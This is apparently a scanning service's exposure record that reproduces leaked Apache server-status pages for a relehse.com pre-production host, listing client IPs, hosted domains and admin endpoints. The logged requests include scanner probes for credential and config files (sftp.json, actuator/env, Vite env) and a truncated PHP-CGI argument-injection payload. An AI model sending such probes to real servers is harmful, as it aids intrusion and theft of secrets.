0/4/4/0/0 (open/recv/resp/push/rst) 0-6621369230/10/8425_ 4.3753028981760.00.05254.99 186.130.102.198http/1.1 0-6621369230/6/8612_ 4.505320928128730.00.09210.42 104.23.209.84h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-6621369230/7/8881_ 5.0252040675350.00.10268.27 172.68.92.194h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6621369230/9/8695_ 5.0352041041300.00.06171.46 172.68.92.194h2tandemsl.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 0-6621369230/15/8412_ 5.0253029039730.00.09262.19 172.68.92.213h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-6621369230/10/8631_ 5.0253040601810.00.09237.91 172.68.92.194h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6621369230/9/8384_ 3.9953037084940.00.04278.37 162.158.222.170h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6621369240/205/10453_ 14.100024717800.010.93248.29 172.71.146.118h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6621369240/178/10890_ 14.130031190600.09.73352.55 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-6621369240/182/10552_ 14.130023894750.016.60262.49 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-6621369240/195/10461_ 14.130026850690.03.37278.28 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-6621369240/186/10889_ 14.130023912990.01.63246.29 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-6621369240/191/11383_ 14.080027765350.03.45354.28 172.68.92.215h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6621369240/188/11006_ 14.131145320230.010.83316.75 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-6621369240/193/11406_ 14.0611222434000.01.74268.56 139.59.136.184http/1.1 1-6621369240/180/9992_ 14.11141927874350.015.69247.70 139.59.136.184h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-6621369240/188/10900_ 14.09035720479260.08.91218.39 139.59.136.184http/1.1 2-6621369220/11/6596_ 5.3152030978890.00.03185.24 172.68.92.214h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-6621369220/14/6283_ 4.8044022868730.00.04226.20 185.224.128.52http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6621369220/16/6703_ 5.3153017812440.00.49212.17 172.68.92.214h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6621369220/10/6480_ 4.6553142472810.00.14236.04 172.68.134.76h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6621369220/11/6656_ 4.635217123292040.00.05283.82 172.71.158.131h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6621369220/13/6448_ 4.6644022312210.00.04226.30 185.224.128.52http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6621369220/18/6790_ 5.3144029407020.00.68215.88 172.68.92.173h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6621369220/12/6415_ 4.91491229735950.00.06141.40 152.53.239.248http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6621369220/13/6556_ 5.3249025458600.00.06183.43 172.68.92.168h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6621369220/11/6552_ 5.3152045136320.00.21231.44 172.68.92.185h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6621369210/8/8484_ 5.4531027987740.00.11279.39 172.68.92.169h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6621369210/9/8293_ 4.7353027355940.00.14280.91 172.68.134.143h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6621369210/13/8718_ 5.4326025718860.00.92234.75 172.68.92.181h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-6621369210/7/8280_ 5.4052029678260.00.04253.54 152.53.239.248http/1.1cinre.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6621369210/8/8357_ 4.7352031884410.00.03248.88 172.68.134.56h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6621369210/11/8508_ 5.4357023176960.00.11246.05 172.68.92.167h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6621369210/11/8436_ 4.7653018771540.00.04328.07 172.68.134.144h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6621369210/7/8746_ 5.4326087750290.020.13273.15 172.68.92.181h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6621369210/9/8193_ 5.4358019533540.00.12239.85 172.68.92.183h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6621369210/10/9310_ 5.39531743801420.00.08309.45 152.53.239.248http/1.1relehse.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-6621370540/163/6432_ 13.6611846876370.02.15238.93 139.59.136.184h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-6621370540/208/5926_ 13.690034855170.02.20234.13 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 4-6621370540/202/6553_ 13.690029791060.040.43231.05 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 4-6621370540/191/6596_ 13.690032204280.02.26215.96 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-6621370540/178/6352_ 13.640027091140.03.94163.55 172.68.92.177h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-6621370540/199/6039_ 13.690035219140.09.71252.47 139.59.136.184http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27d36dc79e
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Monday, 22-Sep-2025 19:16:08 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 60 Parent Server MPM Generation: 59 Server uptime: 10 days 5 hours 55 minutes 5 seconds Server load: 0.06 0.25 0.28 Total accesses: 366468 - Total Traffic: 10.6 GB - Total Duration: 142958438 CPU Usage: u28.69 s34.44 cu1784.1 cs968.57 - .318% CPU load .414 requests/sec - 12.5 kB/second - 30.3 kB/request - 390.098 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03125275no1yes010000 13125408no1yes19000 23125274no0yes010000 33125273no2yes010000 43125276no1yes010000 Sum505 149000 ______________W___________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-5931252750/14/8331_ 1.2414030136200.00.15210.40 172.69.138.218h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5931252750/4/8159_ 0.7016446650700090.00.08230.21 172.71.119.69h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5931252750/5/8631_ 1.495036046200.00.12312.78 167.99.181.249h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-5931252750/8/8288_ 1.49163028806500.00.03251.94 162.158.82.169h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5931252750/7/8474_ 1.24164027916410.00.19206.84 172.69.39.56h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5931252750/6/8747_ 1.24164040556870.00.63265.77 172.69.138.164h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5931252750/8/8559_ 1.36164040869220.00.09170.14 188.114.111.198h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5931252750/4/8260_ 0.65169298328897800.00.08258.46 172.71.194.139h2lcftech.es:443idle, streams: 0/6/6/0/0 (open/recv/resp/push/rst) 0-5931252750/11/8483_ 1.541944040451850.00.13232.59 172.68.22.171h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5931252750/7/8250_ 1.3214036872810.00.46276.61 172.64.236.111h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5931254080/110/9001_ 3.780018231050.00.90213.95 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-5931254080/113/9505_ 3.782024001520.01.23278.46 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-5931254080/115/9110_ 3.762317925290.00.99204.68 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-5931254080/117/9077_ 3.782019829730.00.51237.69 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 1-5931254080/101/9479W 3.780018336960.01.34221.95 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-5931254080/107/9973_ 3.781023387080.01.66242.83 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-5931254080/122/9564_ 3.782040239480.01.20260.65 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-5931254080/114/9957_ 3.692217900620.00.72244.58 167.99.181.249http/1.1 1-5931254080/114/8535_ 3.780019069080.00.66204.73 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-5931254080/115/9496_ 3.770116169900.01.11190.59 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-5931252740/3/6382_ 1.33162030695960.00.83173.70 162.158.82.160h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-5931252740/6/6087_ 1.33164022533740.00.12210.69 162.158.82.138h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5931252740/5/6482_ 1.31163017459720.00.60208.56 172.64.236.211h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 2-5931252740/3/6289_ 1.3416344842119530.00.03233.82 172.71.190.186h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5931252740/4/6463_ 1.301641423075150.00.75282.22 152.53.239.248http/1.1cinre-backend.tandemhse.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-5931252740/3/6235_ 0.66164021905920.00.01215.81 162.158.122.103h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5931252740/2/6566_ 1.34161029106040.00.00204.78 162.158.82.163h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-5931252740/3/6214_ 1.33158029398740.00.01137.38 162.158.82.163h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5931252740/7/6348_ 1.34158025193310.00.13179.37 162.158.82.164h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5931252740/2/6351_ 1.34161044845460.00.00228.58 162.158.82.160h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 3-5931252730/58/7148_ 3.004115742270.01.54239.82 167.99.181.249http/1.1 3-5931252730/66/6823_ 3.031022908400.00.88225.71 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-5931252730/52/7257_ 2.973021809200.00.77206.68 4.227.36.93h2cinre.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5931252730/56/6921_ 2.9931622384060.01.05225.46 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 3-5931252730/53/6977_ 2.903028117640.01.83200.37 167.99.181.249http/1.1 3-5931252730/58/7154_ 2.970818810500.00.59186.92 167.99.181.249http/1.1 3-5931252730/54/7085_ 2.9524015315470.00.75252.02 162.158.123.73h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5931252730/54/7406_ 3.032080538130.00.55227.97 108.162.246.199h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5931252730/47/6779_ 3.041015746150.01.04203.54 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-5931252730/52/7976_ 3.033029478550.00.46258.64 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 4-5931252760/3/5515_ 0.98163044956330.00.00193.28 172.71.239.103h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5931252760/6/4962_ 0.97164032415490.00.07208.61 172.71.238.233h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5931252760/4/5606_ 1.263027566170.00.22143.38 162.158.82.156h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5931252760/6/5646_ 1.262030252820.00.02189.65 162.158.82.152h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 4-5931252760/3/5439_ 1.32859624788850.00.04137.79 104.23.211.228h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5931252760/5/5097_ 1.12164032928670.00.01229.72 162.158.123.107h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-59
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27cf61be9c
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Monday, 22-Sep-2025 16:49:59 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 58 Parent Server MPM Generation: 57 Server uptime: 10 days 3 hours 28 minutes 56 seconds Server load: 0.38 0.52 0.48 Total accesses: 361865 - Total Traffic: 10.5 GB - Total Duration: 140915279 CPU Usage: u27.38 s32.81 cu1764.46 cs958.74 - .318% CPU load .413 requests/sec - 12.5 kB/second - 30.3 kB/request - 389.414 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02630181no0yes010000 12630312no1yes010000 22630180no0yes010000 32630179no1yes19000 42630182no0yes010000 Sum502 149000 ___________________________________W______________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-5726301810/28/8313_ 1.40656029818130.00.24210.24 172.69.168.232h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5726301810/28/8144_ 1.30657150535200.00.35230.05 172.68.125.134h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5726301810/32/8617_ 1.3218068435640180.00.89312.30 172.71.146.150h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5726301810/31/8269_ 1.58180028584110.01.01251.66 152.53.239.248http/1.1cinre.tandemhse.com:443GET / HTTP/1.1 0-5726301810/31/8461_ 1.29180027716010.00.33206.60 172.68.125.130h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5726301810/38/8733_ 1.29656140316690.00.34265.06 172.68.125.137h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5726301810/27/8541_ 1.29656040670930.00.50169.57 172.68.125.158h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5726301810/24/8247_ 1.1932028667050.00.20258.28 193.162.26.9http/1.1 0-5726301810/29/8464_ 1.40656040100070.00.23232.43 172.69.168.226h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5726301810/22/8234_ 1.40656136709930.00.77276.12 172.70.44.149h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5726303120/69/8822_ 3.190017626570.00.51212.04 178.128.207.138http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-5726303120/77/9327_ 3.200023102270.02.59276.23 178.128.207.138http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-5726303120/130/8939_ 3.180017260340.00.93202.79 178.128.207.138http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-5726303120/74/8890_ 3.190019424270.00.79233.29 178.128.207.138http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-5726303120/82/9310_ 3.171117654930.01.25219.68 178.128.207.138http/1.1 1-5726303120/69/9807_ 3.120022821410.01.49240.26 178.128.207.138h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-5726303120/75/9394_ 3.200039468560.00.56258.35 178.128.207.138http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-5726303120/65/9777_ 3.190017389980.00.86242.81 178.128.207.138http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-5726303120/72/8357_ 3.200018408160.01.43196.07 178.128.207.138http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-5726303120/62/9325_ 3.16058115423640.013.54187.94 178.128.207.138h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-5726301800/20/6371_ 1.205429730655570.00.20172.83 193.162.26.9http/1.1relehse.com:443POST /admin/evaluated/list-requirement HTTP/1.1 2-5726301800/22/6076_ 1.27542322531510.00.20210.56 193.162.26.9http/1.1relehse.com:443POST /admin/evaluated/change-selected HTTP/1.1 2-5726301800/20/6467_ 1.286036517434290.00.15207.82 193.162.26.9http/1.1relehse.com:443POST /admin/evaluated/list-requirement HTTP/1.1 2-5726301800/24/6275_ 1.276024242080480.00.30233.72 193.162.26.9http/1.1relehse.com:443POST /admin/evaluated/list-requirement HTTP/1.1 2-5726301800/24/6444_ 1.235574322982680.00.22281.28 193.162.26.9http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5726301800/18/6224_ 1.2760110321832650.00.18215.75 193.162.26.9http/1.1relehse.com:443POST /admin/evaluated/tree HTTP/1.1 2-5726301800/18/6552_ 1.2355118329089180.00.13204.52 193.162.26.9http/1.1relehse.com:443POST /admin/evaluated/list-requirement HTTP/1.1 2-5726301800/20/6202_ 1.25556829373680.00.18136.61 162.158.123.72h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5726301800/17/6331_ 1.27622524980840.00.09179.10 193.162.26.9http/1.1relehse.com:443POST /admin/evaluated/change-selected HTTP/1.1 2-5726301800/21/6339_ 1.2760127444820340.00.11228.38 193.162.26.9http/1.1relehse.com:443POST /admin/evaluated/tree HTTP/1.1 3-5726301790/39/6974_ 1.64394414997620.00.35236.62 193.162.26.9http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5726301790/30/6613_ 1.5402621896910.00.24222.57 193.162.26.9http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5726301790/34/7074_ 1.671121134400.00.26203.78 178.128.207.138http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-5726301790/26/6673_ 1.6601421392440.00.66214.47 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5726301790/38/6779_ 1.670027135700.00.98189.39 178.128.207.138http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-5726301790/33/6984W 1.650018092860.00.25183.78 178.128.207.138http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-5726301790/31/6880_ 1.670014103850.01.16249.12 178.128.207.138http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-5726301790/34/7216_ 1.64121379694530.00.81224.84 178.128.207.138http/1.1 3-5726301790/32/6593_ 1.6406314908100.00.21199.64 193.162.26.9http/1.1relehse.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-5726301790/36/7784_ 1.64317428465610.00.24234.10 193.162.26.9http/1.1relehse.com:443POST /admin/evaluated/list-requirement HTTP/1.1 4-5726301820/9/5467_ 0.9352844732240.00.13192.48 193.162.26.9http/1.1relehse.com:443POST /admin/documents/list-document HTTP/1.1 4-5726301820/13/4904_ 0.9259158032221380.00.05207.28 193.162.26.9http/1.1relehse.com:443POST /admin/evaluated/tree HTTP/1.1 4-5726301820/4/5506_ 0.88474827324570.00.02141.97 193.162.26.9http/1.1relehse.com:443POST /admin/evaluated/change-selected HTTP/1.1 4-5726301820/9/5590_ 0.91622330012810.00.09188.33 193.162.26.9http/1.1relehse.com:443POST /admin/evaluated/change-selected HTTP/1.1 4-5726301820/18/5380_ 0.926138124555410.00.16135.78 193.162.26.9http/1.1relehse.com:443POST /admin/evaluated/list-requirement HTTP/1.1 4-5726301820/9/5048_ 0.9352332834090.00.08228.70 193.162.26.9http/1.1relehse.com:443GET /admin_layout/assets/js/checkbox
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b275afb5827
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Monday, 22-Sep-2025 09:07:35 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 47 Parent Server MPM Generation: 46 Server uptime: 9 days 19 hours 46 minutes 32 seconds Server load: 0.28 0.24 0.26 Total accesses: 341168 - Total Traffic: 9.9 GB - Total Duration: 127585115 CPU Usage: u95.04 s72.18 cu1624.97 cs879.64 - .315% CPU load .402 requests/sec - 12.2 kB/second - 30.4 kB/request - 373.966 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 04087830no0yes19000 14087829no0yes010000 24087831no1yes010000 34087962no0yes010000 44087828no0yes010000 Sum501 149000 W_________________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-4640878300/521/7526W 41.230023618280.030.86200.03 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-4640878300/531/7483_ 41.24394744970770.015.45217.50 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4640878300/487/7957_ 41.252030847560.019.80301.85 138.197.191.87h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-4640878300/507/7665_ 41.300024227700.016.71230.95 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-4640878300/462/7804_ 41.30437223497960.022.52196.00 108.162.226.120h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4640878300/489/7944_ 41.153950535032750.043.23239.74 172.68.245.70h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4640878300/471/7828_ 41.28443133933770.08.22156.21 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4640878300/496/7445_ 41.2701024518820.025.39243.44 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 0-4640878300/485/7748_ 41.206059832204670.021.29216.96 108.162.245.247h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4640878300/490/7529_ 41.1723730528850.015.36264.17 138.197.191.87h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-4640878290/24/8686_ 14.3010481117371080.00.21208.50 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4640878290/22/9193_ 14.281288222830650.00.93269.37 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4640878290/23/8739_ 14.181288116986050.00.09200.59 162.158.6.220h2lcftech.es:443done, streams: 0/8/8/0/8 (open/recv/resp/push/rst) 1-4640878290/17/8751_ 14.311287019235650.00.10231.16 172.64.237.2h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4640878290/21/9164_ 14.281048517344160.00.33217.55 2.136.78.3h2relehse.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-4640878290/21/9676_ 14.321292022502230.00.26237.36 188.114.111.206h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4640878290/17/9252_ 14.321293039251770.00.56244.13 162.158.123.81h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4640878290/19/9651_ 14.281287217148690.00.25241.13 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4640878290/23/8217_ 14.4010534218064050.00.26193.59 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4640878290/16/9184_ 14.301293114979380.00.13172.46 2.136.78.3h2relehse.com:443idle, streams: 0/8/8/0/7 (open/recv/resp/push/rst) 2-4640878310/103/5824_ 15.220029605720.01.46164.53 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-4640878310/62/5537_ 15.220021158480.01.38201.89 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-4640878310/55/5866_ 15.220016150980.00.68170.02 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-4640878310/60/5726_ 15.2003240734070.00.54211.76 138.197.191.87http/1.1 2-4640878310/115/5802_ 15.220021901830.01.03248.24 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-4640878310/89/5674_ 15.180220694690.00.75206.87 138.197.191.87h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-4640878310/51/5895_ 15.220027894070.00.85193.17 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 2-4640878310/76/5615_ 15.220028287690.02.83125.54 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-4640878310/57/5827_ 15.170223724910.01.74148.73 138.197.191.87h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-4640878310/115/5761_ 15.220043395700.02.21218.34 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-4640879620/396/6706_ 32.921043314631950.06.92229.40 165.225.92.143http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 3-4640879620/397/6433_ 32.8223434521432550.08.95219.05 172.70.189.49h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4640879620/451/6842_ 32.831174220774770.08.33199.10 2.136.78.3h2pre.relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4640879620/386/6520_ 32.61993020484850.021.44211.26 165.225.92.143http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 3-4640879620/422/6598_ 